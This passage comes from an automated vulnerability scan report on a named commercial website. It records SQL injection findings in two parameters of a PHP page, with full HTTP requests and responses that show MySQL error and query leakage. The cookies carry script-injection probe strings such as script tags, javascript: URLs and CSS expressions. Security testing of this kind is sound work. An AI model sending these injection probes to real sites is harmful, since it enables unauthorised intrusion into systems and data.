OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 898

subcategoryId=30005&catId=30005&iusrc=iupsc+&attributeId_429=2789__Commercial+mortgage+loan+(this+answer+redirects+to+our+commercial+mortgages+page)&attributeId_438=2845__Yes+-+we+accept+Visa+and%2for
...[SNIP]...

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:23:26 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=6id8ruh337migdf68or7uaomp3; path=/
Content-Length: 129
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/bulo00''/project_dynamic_page_updated.php was not found on this server.</p>

1.78. http://www.insideup.com/ppc/leadflow/bulo00/project_dynamic_page_updated.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project_dynamic_page_updated.php

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

POST /ppc/leadflow/bulo00/project_dynamic_page_updated.php'?catId=30005&group=bulo00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 898

subcategoryId=30005&catId=30005&iusrc=iupsc+&attributeId_429=2789__Commercial+mortgage+loan+(this+answer+redirects+to+our+commercial+mortgages+page)&attributeId_438=2845__Yes+-+we+accept+Visa+and%2for
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:23:58 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=gcrn384p657s3qlhcmhpbtk306; path=/
Content-Length: 2486
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
leadflow/bulo00/project_dynamic_page_updated.php'?catId=30005&group=bulo00&template=3' OR prj.project_page_url = 'leadflow/bulo00/project_dynamic_page_updated.php'?catId=30005&group=bulo00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=30005&group=bulo00&template=3' OR prj.project_page_url = 'leadflow/bulo00' at line 5

Request 2

POST /ppc/leadflow/bulo00/project_dynamic_page_updated.php''?catId=30005&group=bulo00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 898

subcategoryId=30005&catId=30005&iusrc=iupsc+&attributeId_429=2789__Commercial+mortgage+loan+(this+answer+redirects+to+our+commercial+mortgages+page)&attributeId_438=2845__Yes+-+we+accept+Visa+and%2for
...[SNIP]...

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:23:59 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=hlhhpu6nte9kq0k8euuu98hv84; path=/
Content-Length: 129
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/bulo00/project_dynamic_page_updated.php'' was not found on this server.</p>

1.79. http://www.insideup.com/ppc/leadflow/bulo00/project_dynamic_page_updated.php [catId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project_dynamic_page_updated.php

Issue detail

The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

POST /ppc/leadflow/bulo00/project_dynamic_page_updated.php?catId=30005'&group=bulo00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 898

subcategoryId=30005&catId=30005&iusrc=iupsc+&attributeId_429=2789__Commercial+mortgage+loan+(this+answer+redirects+to+our+commercial+mortgages+page)&attributeId_438=2845__Yes+-+we+accept+Visa+and%2for
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:12:06 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=asdbkhubift16fnumoe3qcvcs4; path=/
Content-Length: 2486
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
leadflow/bulo00/project_dynamic_page_updated.php?catId=30005'&group=bulo00&template=3' OR prj.project_page_url = 'leadflow/bulo00/project_dynamic_page_updated.php?catId=30005'&group=bulo00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group=bulo00&template=3' OR prj.project_page_url = 'leadflow/bulo00/project_dyna' at line 5

Request 2

POST /ppc/leadflow/bulo00/project_dynamic_page_updated.php?catId=30005''&group=bulo00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 